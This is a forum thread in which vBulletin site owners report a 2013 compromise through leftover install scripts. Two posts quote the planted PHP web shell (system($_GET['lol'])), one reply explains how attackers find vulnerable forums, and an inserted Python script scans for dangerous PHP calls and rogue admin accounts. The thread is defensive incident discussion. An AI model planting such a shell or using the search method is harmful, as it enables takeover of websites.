A new type hack method?

  • Jamsoft
    Member
    • Jun 2011
    • 71

    #16
    Originally posted by DF031
    I agree, what about all those admins not visiting the forums?

    VB should have contacted all forum owners. It is not too late to do that and provide this basic support!
    Agreed!! I "happened" to see this in the CP yesterday, and went ahead and did what they said. BUT, they didn't say "check to see if you had admin accounts to see if you have been compromised." I did what they asked and researched no further. Today I am out like 40,000 posts that were deleted early this morning.

    How about an email to all owners, not only with a fix, but what to check to see if you've been compromised? Handled very badly.


    • Reignman
      New Member
      • Dec 2011
      • 25
      • 4.1.x

      #17
      Originally posted by Hawkmoth
      As above. This problem was found on Tuesday morning about 11 am Japan time. Like reignman, we had 2 people registered as federal. One is now deleted and the other had all permissions removed and PW changed. I have no idea how he got in. All new members receive an email with an activation link in it. They have to click to become active but even then they only go into an admin queue for final approval. Supposedly, no one can do anything until admin approval and only admins can do it, not mods. Maybe Abdou found some way to make himself an admin but I don't know how.

      I have also found a file "federal" in the plugin and that is removed. We only have vb software and vb advanced for the front page (with all our language forums). vba is the only plugin that is set up. All "abdou" did is deface our frontpage. The forum works fine from forum/php page. I have removed the install file as Zachary has indicated. But the problem has not been resolved.

      NB: vis-à-vis Abdou, we may have identified him and some of his hacker friends. Since our website runs on a US server Abdou has violated federal law (maybe USC Title 18 but I don't have the citation in front of me). Abdou has been reported to law enforcement agencies in the USA and UK among others. If anyone else has been hacked and you have any LE friends, let them know.
      He gets admin privileges when registering to the forum (using the exploit), so he can do whatever he wants.

      Another warning to forum owners: if your password in config.php is equal to your ftp/server passwords, you have to change these passwords.


      • Reignman
        New Member
        • Dec 2011
        • 25
        • 4.1.x

        #18
        Originally posted by Jamsoft

        Agreed!! I "happened" to see this in the CP yesterday, and went ahead and did what they said. BUT, they didn't say "check to see if you had admin accounts to see if you have been compromised." I did what they asked and researched no further. Today I am out like 40,000 posts that were deleted early this morning.

        How about an email to all owners, not only with a fix, but what to check to see if you've been compromised? Handled very badly.
        Yes, that was a big mistake. I don't know why the CP message didn't include this "added admins" warning.

        By the way, are you sure that these messages were deleted by this hacker called "abdou" ?


        • Infection
          Member
          • Jan 2007
          • 33
          • 3.6.x

          #19
          I have the same problem. The hacker has registered as an Admin, then created a plugin with the hook location ajax_start:

          Code:
          if (isset($_GET['lol'])) {      // attacker-chosen trigger parameter in the query string
              echo "<h1>pwn</h1><pre>";   // banner, then preformatted block for the command output
              system($_GET['lol']);       // runs the raw GET value as a shell command on the web server
              exit;                       // stop vBulletin from rendering anything after the output
          }
          Please advise. I don't have the install directory at all prior to this hack.


          • Reignman
            New Member
            • Dec 2011
            • 25
            • 4.1.x

            #20
            Originally posted by Infection
            I have the same problem. The hacker has registered as an Admin, then created a plugin with the hook location ajax_start:

            Code:
            if (isset($_GET['lol'])) {      // attacker-chosen trigger parameter in the query string
                echo "<h1>pwn</h1><pre>";   // banner, then preformatted block for the command output
                system($_GET['lol']);       // runs the raw GET value as a shell command on the web server
                exit;                       // stop vBulletin from rendering anything after the output
            }
            Please advise. I don't have the install directory at all prior to this hack.
            Which version do you use? If you use vBulletin 5, the install directory is inside the core directory. >>> /core/install

            He needs install/upgrade.php in order to complete the hijacking, so if you don't have an "install" directory and still have the above problem, that means it's another vulnerability.


            • KryptonSite
              Member
              • Apr 2004
              • 31

              #21
              I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

              I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?


              • Infection
                Member
                • Jan 2007
                • 33
                • 3.6.x

                #22
                Originally posted by Reignman

                Which version do you use? If you use vBulletin 5, the install directory is inside the core directory. >>> /core/install

                He needs install/upgrade.php in order to complete the hijacking, so if you don't have an "install" directory and still have the above problem, that means it's another vulnerability.
                I'm using version 4.2.0 (I've yet to update to the latest 4.2.1 version). There is definitely no "install" directory in my forum's root folder, as far as I can see. It could be another vulnerability.

                Does anyone have any ideas as to what this could be?


                • Reignman
                  New Member
                  • Dec 2011
                  • 25
                  • 4.1.x

                  #23
                  Originally posted by KryptonSite
                  I just noticed I had a new user registered on my forum calling himself "administrator." Found it fishy, and saw they put themselves in the administrator area... with no IP address tied to anything and a clearly fake e-mail address. Banned the account.

                  I've deleted my install directory since then though, but what I'm wondering is... is this tied to that install directory exploit? Or has anyone else witnessed something like this?
                  Do you have any "strange" plugin on your vBulletin products? It's one of the symptoms of this exploit.

                  Originally posted by Infection

                  I'm using version 4.2.0 (I've yet to update to the latest 4.2.1 version). There is definitely no "install" directory in my forum's root folder, as far as I can see. It could be another vulnerability.

                  Does anyone have any ideas as to what this could be?
                  Probably it's another one. Better contact vBulletin support.

                  The bad thing is I see slight changes in the code and hacking messages, so I think it's now spread around.


                  • Jntu Hub
                    Senior Member
                    • May 2011
                    • 237
                    • 4.2.X

                    #24
                    My site was hacked with a new name.
                    www.jntuhub.com | www.jntuhub.in |


                    • DemOnstar
                      Senior Member
                      • Nov 2012
                      • 1912

                      #25
                      How does something like this get around so quickly?
                      Not a robot, or a macro, this is an individual or group of individuals exploiting a vulnerability...
                      I haven't been affected yet, maybe because I was active in the admin cp at the time of the notification and deleted the install folder?

                      But is the install folder the hole? Has this been clarified?

                      How do they find a vulnerable site to begin with? Surely there is no google search term 'vulnerable vB sites'.

                      What do they search for in order to complete the job?



                      • Reignman
                        New Member
                        • Dec 2011
                        • 25
                        • 4.1.x

                        #26
                        Originally posted by DemOnstar
                        How does something like this get around so quickly?
                        Not a robot, or a macro, this is an individual or group of individuals exploiting a vulnerability...
                        I haven't been affected yet, maybe because I was active in the admin cp at the time of the notification and deleted the install folder?

                        But is the install folder the hole? Has this been clarified?

                        How do they find a vulnerable site to begin with? Surely there is no google search term 'vulnerable vB sites'.

                        What do they search for in order to complete the job?
                        Yes, the hole is in the install folder (at least for this exploit).

                        They search for vBulletin-powered websites using phrases like "powered by vbulletin 4.2.0 / 4.2.1 / 5" and then check manually whether the install folder exists by typing domain.com/forumpath/install/upgrade.php

                        If it exists they complete the job using the exploit they found. (I wonder if the vBulletin team has found what it is yet???) If it doesn't exist, they go back to Google and search for other potential victims.

                        But what we know is they can use this exploit only on the 4.2.0+ and 5 versions of vBulletin.
                        Last edited by Reignman; Mon 2 Sep '13, 5:01am.



                        • DemOnstar commented
                          Very good Reignman, that is exactly what I wanted to hear... It seems so easy to mess up someone's life... and all that is needed is a search on Google. Extraordinary!
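Posts #16 to #28 between them describe three things a forum owner should check after this advisory: whether an admin account was added behind their back (the "administrator" and "Th3H4ck" accounts, blank IP, fake e-mail), whether a backdoor plugin such as the `system($_GET['lol'])` one on `ajax_start` is installed, and whether the install scripts the attackers probe for are still on disk (install/ on vBulletin 4, core/install/ on vBulletin 5). The script below is an added example of those checks, not vBulletin's own tooling or any poster's code. It assumes vBulletin's `user`, `administrator` and `plugin` tables with the column names used here and usergroupid 6 as the Administrators group, and it runs against an in-memory SQLite copy filled with constructed rows in place of the live MySQL database; point the same queries at the real database to use it.

```python
"""Post-compromise checks for the vBulletin install/upgrade.php incident.

Added example, not vBulletin's or any poster's code. Assumptions: vBulletin's
`user`, `administrator` and `plugin` tables with the columns used below, and
usergroupid 6 = Administrators. An in-memory SQLite copy with constructed rows
stands in for the live MySQL database.
"""
import os
import re
import sqlite3
import tempfile

ADMIN_USERGROUP = 6  # assumption: default vBulletin "Administrators" group id

# PHP calls that have no place in a legitimate plugin, matched in plugin.phpcode.
DANGEROUS_CALLS = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert|"
    r"base64_decode|create_function)\s*\(", re.IGNORECASE)
# A request superglobal next to such a call means a remotely triggerable shell.
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[")


def find_backdoor_plugins(conn):
    """Return (pluginid, title, hookname, takes_request_input) for every plugin
    whose PHP calls a dangerous function, whatever hook it is attached to."""
    hits = []
    for pluginid, title, hookname, phpcode in conn.execute(
            "SELECT pluginid, title, hookname, phpcode FROM plugin ORDER BY pluginid"):
        if DANGEROUS_CALLS.search(phpcode):
            hits.append((pluginid, title, hookname, bool(REQUEST_INPUT.search(phpcode))))
    return hits


def find_unexpected_admins(conn, known_admin_ids):
    """Return users holding admin rights who are not on the owner's allow-list.
    Rights can come from the primary usergroup, a secondary membergroup, or a
    row in `administrator`; an attacker with DB access can grant any of them."""
    found = []
    for row in conn.execute(
            "SELECT u.userid, u.username, u.usergroupid, u.membergroupids, "
            "       u.joindate, u.ipaddress, u.email, "
            "       EXISTS(SELECT 1 FROM administrator a WHERE a.userid = u.userid) "
            "FROM user u ORDER BY u.userid"):
        userid, username, ugid, mgids, joindate, ip, email, in_admin_table = row
        secondary = {int(g) for g in mgids.split(",") if g.strip()}
        is_admin = (ugid == ADMIN_USERGROUP or ADMIN_USERGROUP in secondary
                    or bool(in_admin_table))
        if is_admin and userid not in known_admin_ids:
            found.append({"userid": userid, "username": username, "joindate": joindate,
                          "ipaddress": ip, "email": email,
                          "no_ip": ip == ""})  # blank IP, as reported in post #21
    return found


def install_dir_exposed(forum_root):
    """Return leftover install scripts relative to the forum root. vBulletin 4
    keeps them under install/, vBulletin 5 under core/install/ (posts #20, #30)."""
    candidates = ["install/upgrade.php", "install/install.php",
                  "core/install/upgrade.php", "core/install/install.php"]
    return [c for c in candidates if os.path.isfile(os.path.join(forum_root, c))]


def build_sample_db():
    """Constructed rows modelled on the reports in this thread."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE user (userid INTEGER, username TEXT, usergroupid INTEGER,
            membergroupids TEXT, joindate INTEGER, ipaddress TEXT, email TEXT);
        CREATE TABLE administrator (userid INTEGER);
        CREATE TABLE plugin (pluginid INTEGER, title TEXT, hookname TEXT,
            phpcode TEXT, active INTEGER);
    """)
    conn.executemany("INSERT INTO user VALUES (?,?,?,?,?,?,?)", [
        (1, "owner", 6, "", 1200000000, "203.0.113.5", "owner@example.net"),
        (2, "regular", 2, "", 1300000000, "198.51.100.7", "user@example.net"),
        (3, "administrator", 2, "6", 1377993600, "", "a@a.a"),  # cf. post #21
        (4, "Th3H4ck", 6, "", 1377993600, "", "x@x.x"),         # cf. post #28
    ])
    conn.executemany("INSERT INTO administrator VALUES (?)", [(1,), (3,), (4,)])
    conn.executemany("INSERT INTO plugin VALUES (?,?,?,?,?)", [
        (10, "vBa CMPS", "global_start", "$vbulletin->options['x'] = 1;", 1),
        (11, "federal", "ajax_start",  # the backdoor quoted in post #19
         "if(isset($_GET['lol'])){echo \"<h1>pwn</h1><pre>\"; system($_GET['lol']);exit;}", 1),
    ])
    return conn


def demo_install_check():
    """Build a throwaway forum root with a leftover install/upgrade.php and
    return what install_dir_exposed() reports for it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "install"))
    open(os.path.join(root, "install", "upgrade.php"), "w").close()
    return install_dir_exposed(root)


if __name__ == "__main__":
    db = build_sample_db()
    for hit in find_backdoor_plugins(db):
        print("backdoor plugin:", hit)
    for user in find_unexpected_admins(db, known_admin_ids={1}):
        print("unexpected admin:", user)
    print("leftover install scripts:", demo_install_check())
```

The plugin scan is deliberately hook-agnostic: the thread's sample sits on `ajax_start`, but nothing stops the same body from being attached to any other hook, and a variant that reads `$_POST` or a cookie instead of `$_GET['lol']` is still flagged because the dangerous call, not the parameter name, is what matters. Run the admin check with your real list of administrator userids, and treat a hit with a recent joindate and blank IP as the account created by the exploit rather than a false positive.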
                      • mat8861
                        New Member
                        • Jan 2011
                        • 20

                        #27
                        What about VB not sending an advice email to licensed members?? I was here for another problem and now I am reading this thread, really surprised!!


                        • djsteve007
                          New Member
                          • Dec 2012
                          • 8
                          • 3.8.x

                          #28
                          Looks like I got hit with a similar exploit - they did not deface my site like the OP's - not yet anyway. They did find a way to add about 10 new users, all with the same username (Th3H4ck) and all with admin privs.

                          I would not have known about this vulnerability, or the active exploit, if they had not .. maybe I should not post what triggered my knowledge of this.

                          I would have liked to have received an email about this exploit. Now going to 302 redirect to my buddypress install. Hope my host has backup database and files from 5 days ago. Fingers crossed.

                          vbulletin 4.2.1 running, and had new member moderation turned on -

                          what I wonder is how they were able to run sql insert commands from /forums/core/install/upgrade.php --- when I do not even have a /core/ or /core/install/ folder on this server.

                          Will we get an email if the exploit fix is found?


                          • DemOnstar
                            Senior Member
                            • Nov 2012
                            • 1912

                            #29
                            Originally posted by djsteve007

                            Will we get an email if the exploit fix is found?
                            I think that is extremely likely now. Although, stranger things can happen..



                            • Reignman
                              New Member
                              • Dec 2011
                              • 25
                              • 4.1.x

                              #30
                              Originally posted by djsteve007
                              vbulletin 4.2.1 running, and had new member moderation turned on -

                              what I wonder is how they were able to run sql insert commands from /forums/core/install/upgrade.php --- when I do not even have a /core/ or /core/install/ folder on this server.
                              If you use version 4, you don't have /core/install but only /install in your forum root.

